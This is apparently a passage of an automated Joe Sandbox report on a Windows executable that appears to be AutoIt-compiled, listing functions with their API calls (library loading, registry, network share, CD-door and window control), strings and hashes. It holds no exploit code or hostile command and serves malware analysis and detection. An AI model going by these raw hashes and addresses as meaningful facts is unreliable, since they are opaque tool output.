                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: BuffCharMessageSendUpper
                                                            • String ID: @U=u$CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                            • API String ID: 3974292440-383632319
                                                            • Opcode ID: 432e60353af8fcd6527d3f89bec40528310dbf6a6ea0fba9628ca5c2b9b385bc
                                                            • Instruction ID: 496461d5f54ba09e83fda9e1cb1ceae2f4e01fd5839b4da1b270dd26e73bab7d
                                                            • Opcode Fuzzy Hash: 432e60353af8fcd6527d3f89bec40528310dbf6a6ea0fba9628ca5c2b9b385bc
                                                            • Instruction Fuzzy Hash: 69919F342047019FCB04EF10C861A6EB7E1EF95758F144869FD965B3A2DB30ED49EBA2
                                                            Function 00D5B7FE Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 197windowlibraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00D5B8B4
                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00D56B11,?), ref: 00D5B910
                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00D5B949
                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00D5B98C
                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00D5B9C3
                                                            • FreeLibrary.KERNEL32(?), ref: 00D5B9CF
                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00D5B9DF
                                                            • DestroyIcon.USER32(?), ref: 00D5B9EE
                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00D5BA0B
                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00D5BA17
                                                              • Part of subcall function 00CF2EFD: __wcsicmp_l.LIBCMT ref: 00CF2F86
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                            • String ID: .dll$.exe$.icl$@U=u
                                                            • API String ID: 1212759294-1639919054
                                                            • Opcode ID: ffaa4ef8fd55eb322a19f2fe9ab496cae33c446497b60e50424b8e6cf18880b2
                                                            • Instruction ID: 32a11105f3e8f0e2632d0f3b844dbf2e273e37f45dbfecad2a9a9ca92dec5bff
                                                            • Opcode Fuzzy Hash: ffaa4ef8fd55eb322a19f2fe9ab496cae33c446497b60e50424b8e6cf18880b2
                                                            • Instruction Fuzzy Hash: 1061BE71900319BAEF14DF64DC46FBA7BA8EB08722F104516FE15DA1D0DB74A984EBB0
                                                            Function 00D3A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD9837: __itow.LIBCMT ref: 00CD9862
                                                              • Part of subcall function 00CD9837: __swprintf.LIBCMT ref: 00CD98AC
                                                            • CharLowerBuffW.USER32(?,?), ref: 00D3A3CB
                                                            • GetDriveTypeW.KERNEL32 ref: 00D3A418
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D3A460
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D3A497
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D3A4C5
                                                              • Part of subcall function 00CD7BCC: _memmove.LIBCMT ref: 00CD7C06
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                            • API String ID: 2698844021-4113822522
                                                            • Opcode ID: 274124014543512a62cf5b9f2ff5ac596cfaa373e462a3aa85e1340e79fd12f6
                                                            • Instruction ID: d4832f2c61550c3a0e0ba218db99ce0be6ff1a6bed672c0affeb926c6c3499cb
                                                            • Opcode Fuzzy Hash: 274124014543512a62cf5b9f2ff5ac596cfaa373e462a3aa85e1340e79fd12f6
                                                            • Instruction Fuzzy Hash: D9517E711043049FC700EF24C99186AB3F4EF84718F54896EF98A973A1DB31ED0ADBA2
                                                            Function 00D2F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00D0E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00D2F8DF
                                                            • LoadStringW.USER32(00000000,?,00D0E029,00000001), ref: 00D2F8E8
                                                              • Part of subcall function 00CD7DE1: _memmove.LIBCMT ref: 00CD7E22
                                                            • GetModuleHandleW.KERNEL32(00000000,00D95310,?,00000FFF,?,?,00D0E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00D2F90A
                                                            • LoadStringW.USER32(00000000,?,00D0E029,00000001), ref: 00D2F90D
                                                            • __swprintf.LIBCMT ref: 00D2F95D
                                                            • __swprintf.LIBCMT ref: 00D2F96E
                                                            • _wprintf.LIBCMT ref: 00D2FA17
                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00D2FA2E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                            • API String ID: 984253442-2268648507
                                                            • Opcode ID: 2b0d422ff26110c6e95883f2149356c10e4916b9ffa3bfa78f963e94f6406efc
                                                            • Instruction ID: 84bf1f7dd7cd11068074a9b099eba2bfbd72c9b2d2cb73f9ad6f33afb39c1162
                                                            • Opcode Fuzzy Hash: 2b0d422ff26110c6e95883f2149356c10e4916b9ffa3bfa78f963e94f6406efc
                                                            • Instruction Fuzzy Hash: B6413B72804219AACF04FBE4DD96EEE7778AF14300F500566B605B6292EA316F49DB71
                                                            Function 00D3D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __wsplitpath.LIBCMT ref: 00D3DA10
                                                            • _wcscat.LIBCMT ref: 00D3DA28
                                                            • _wcscat.LIBCMT ref: 00D3DA3A
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00D3DA4F
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00D3DA63
                                                            • GetFileAttributesW.KERNEL32(?), ref: 00D3DA7B
                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00D3DA95
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00D3DAA7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                            • String ID: *.*
                                                            • API String ID: 34673085-438819550
                                                            • Opcode ID: ffcf11ea5949c338d78b3368e6b5ea3d3c74d4a8743f33f05c8356e439e89b0d
                                                            • Instruction ID: ca0c7aceac900db4375c355baa7698ab35511dcac533d123d4b43a9ae7d83202
                                                            • Opcode Fuzzy Hash: ffcf11ea5949c338d78b3368e6b5ea3d3c74d4a8743f33f05c8356e439e89b0d
                                                            • Instruction Fuzzy Hash: 318190725043419FCB64EF64D840AAAB7EAFF89710F18482EF889CB251E630D944DF72
                                                            Function 00D5C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD2612: GetWindowLongW.USER32(?,000000EB), ref: 00CD2623
                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00D5C1FC
                                                            • GetFocus.USER32 ref: 00D5C20C
                                                            • GetDlgCtrlID.USER32(00000000), ref: 00D5C217
                                                            • _memset.LIBCMT ref: 00D5C342
                                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00D5C36D
                                                            • GetMenuItemCount.USER32(?), ref: 00D5C38D
                                                            • GetMenuItemID.USER32(?,00000000), ref: 00D5C3A0
                                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00D5C3D4
                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00D5C41C
                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00D5C454
                                                            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00D5C489
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                            • String ID: 0
                                                            • API String ID: 1296962147-4108050209
                                                            • Opcode ID: 45e5a7720d755468fa01c81190361ebd4df01cc60f6e8d917273f8ba3a22d494
                                                            • Instruction ID: 7c76aa914febdebb96ccece7fea9f6d9e14630375868ec509fa9e48c14ff8faa
                                                            • Opcode Fuzzy Hash: 45e5a7720d755468fa01c81190361ebd4df01cc60f6e8d917273f8ba3a22d494
                                                            • Instruction Fuzzy Hash: CF818C702183059FEB11CF14D884A6BBBE8EB88715F04592EFD9597291D770E908CB72
                                                            Function 00D4731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 00D4738F
                                                            • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00D4739B
                                                            • CreateCompatibleDC.GDI32(?), ref: 00D473A7
                                                            • SelectObject.GDI32(00000000,?), ref: 00D473B4
                                                            • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00D47408
                                                            • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00D47444
                                                            • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00D47468
                                                            • SelectObject.GDI32(00000006,?), ref: 00D47470
                                                            • DeleteObject.GDI32(?), ref: 00D47479
                                                            • DeleteDC.GDI32(00000006), ref: 00D47480
                                                            • ReleaseDC.USER32(00000000,?), ref: 00D4748B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                            • String ID: (
                                                            • API String ID: 2598888154-3887548279
                                                            • Opcode ID: 9ceae62306657f4453ffa00f0bbdbd526a116f16977a757c2ea41723044ae41f
                                                            • Instruction ID: fb99ed0a98f5a631f3f8538171fc2d6ee483dd451e981ad523dd0d13debf56b1
                                                            • Opcode Fuzzy Hash: 9ceae62306657f4453ffa00f0bbdbd526a116f16977a757c2ea41723044ae41f
                                                            • Instruction Fuzzy Hash: BC513875904309EFCB14CFA8CC89EAEBBB9EF48710F148429F99997351C731A9408B60
                                                            Function 00D34F75 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 72sleepwindowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • timeGetTime.WINMM ref: 00D34F7A
                                                              • Part of subcall function 00CF049F: timeGetTime.WINMM(?,753DB400,00CE0E7B), ref: 00CF04A3
                                                            • Sleep.KERNEL32(0000000A), ref: 00D34FA6
                                                            • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00D34FCA
                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00D34FEC
                                                            • SetActiveWindow.USER32 ref: 00D3500B
                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00D35019
                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00D35038
                                                            • Sleep.KERNEL32(000000FA), ref: 00D35043
                                                            • IsWindow.USER32 ref: 00D3504F
                                                            • EndDialog.USER32(00000000), ref: 00D35060
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                            • String ID: @U=u$BUTTON
                                                            • API String ID: 1194449130-2582809321
                                                            • Opcode ID: f28518ce158b9e542d47b9d28087630d4ba3cc44fda01a1da3bb868a3f40413b
                                                            • Instruction ID: 6246f0462efaf31f184de9efadfdfb5b4d9a52bc050b82e4d11424f12555dec8
                                                            • Opcode Fuzzy Hash: f28518ce158b9e542d47b9d28087630d4ba3cc44fda01a1da3bb868a3f40413b
                                                            • Instruction Fuzzy Hash: E2218E71204705AFE7515F20FC89B2A3BA9EB4A746F0A1035F901C63B5DB72DD509B72
                                                            Function 00CD6A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CF0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00CD6B0C,?,00008000), ref: 00CF0973
                                                              • Part of subcall function 00CD4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00CD4743,?,?,00CD37AE,?), ref: 00CD4770
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00CD6BAD
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00CD6CFA
                                                              • Part of subcall function 00CD586D: _wcscpy.LIBCMT ref: 00CD58A5
                                                              • Part of subcall function 00CF363D: _iswctype.LIBCMT ref: 00CF3645
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                            • API String ID: 537147316-1018226102
                                                            • Opcode ID: dff791aaa311216a384e14f38ac2d96b25e4cd0ae2bb13802c430de900d58235
                                                            • Instruction ID: 9521b074eff892f99eae31f9d8dafc7918c97adcd8a37ac4c83d356d75a47c52
                                                            • Opcode Fuzzy Hash: dff791aaa311216a384e14f38ac2d96b25e4cd0ae2bb13802c430de900d58235
                                                            • Instruction Fuzzy Hash: FE02AD311083409FC724EF24C881AAFBBE5EF94314F144D1EF69A972A2DB31D949DB62
                                                            Function 00D32D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00D32D50
                                                            • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00D32DDD
                                                            • GetMenuItemCount.USER32(00D95890), ref: 00D32E66
                                                            • DeleteMenu.USER32(00D95890,00000005,00000000,000000F5,?,?), ref: 00D32EF6
                                                            • DeleteMenu.USER32(00D95890,00000004,00000000), ref: 00D32EFE
                                                            • DeleteMenu.USER32(00D95890,00000006,00000000), ref: 00D32F06
                                                            • DeleteMenu.USER32(00D95890,00000003,00000000), ref: 00D32F0E
                                                            • GetMenuItemCount.USER32(00D95890), ref: 00D32F16
                                                            • SetMenuItemInfoW.USER32(00D95890,00000004,00000000,00000030), ref: 00D32F4C
                                                            • GetCursorPos.USER32(?), ref: 00D32F56
                                                            • SetForegroundWindow.USER32(00000000), ref: 00D32F5F
                                                            • TrackPopupMenuEx.USER32(00D95890,00000000,?,00000000,00000000,00000000), ref: 00D32F72
                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00D32F7E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                            • String ID:
                                                            • API String ID: 3993528054-0
                                                            • Opcode ID: b4416c4292f4296165c77866a9a603850baf09b194c996367ac59535e6b86f64
                                                            • Instruction ID: 76d459eb24e5410dd54242c50d40cdea4361d173c2f6e1b25b7213622dbef41b
                                                            • Opcode Fuzzy Hash: b4416c4292f4296165c77866a9a603850baf09b194c996367ac59535e6b86f64
                                                            • Instruction Fuzzy Hash: A471B370A40305BAEB219F55DC86FBABF64FF04764F144226F625AA1E1C7B1A810DBB4
                                                            Function 00D277DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD7BCC: _memmove.LIBCMT ref: 00CD7C06
                                                            • _memset.LIBCMT ref: 00D2786B
                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00D278A0
                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00D278BC
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00D278D8
                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00D27902
                                                            • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00D2792A
                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00D27935
                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00D2793A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                            • API String ID: 1411258926-22481851
                                                            • Opcode ID: 031cc128f5947f9379cede4cb7f9162b0e29f762f758c8176b53761fbcc21c31
                                                            • Instruction ID: d15a3204cb464bb47d5355bdf5865b39a9706150e333a08726475f9743a69373
                                                            • Opcode Fuzzy Hash: 031cc128f5947f9379cede4cb7f9162b0e29f762f758c8176b53761fbcc21c31
                                                            • Instruction Fuzzy Hash: B9411972C14229ABCF21EBA4DC85DEEB778FF14350F04416AF905A72A1EA319D05DBA0
                                                            Function 00D50E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00D4FDAD,?,?), ref: 00D50E31
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                            • API String ID: 3964851224-909552448
                                                            • Opcode ID: 7072ce179a35dcc4f0b8faa502eee36d4600de7895a7cba93a8896c2c552f86d
                                                            • Instruction ID: b787f3e4b45f84b404a9ca7fe55dff5df9ab7d876aae5b95dcfcf3a99566fceb
                                                            • Opcode Fuzzy Hash: 7072ce179a35dcc4f0b8faa502eee36d4600de7895a7cba93a8896c2c552f86d
                                                            • Instruction Fuzzy Hash: 4141383110024A8BCF20EF54D966AFE3B64AF11705F290455FDA61B392DB30D91AEBB1
                                                            Function 00D574BB Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 101windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00D5755E
                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00D57565
                                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00D57578
                                                            • SelectObject.GDI32(00000000,00000000), ref: 00D57580
                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 00D5758B
                                                            • DeleteDC.GDI32(00000000), ref: 00D57594
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00D5759E
                                                            • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00D575B2
                                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00D575BE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
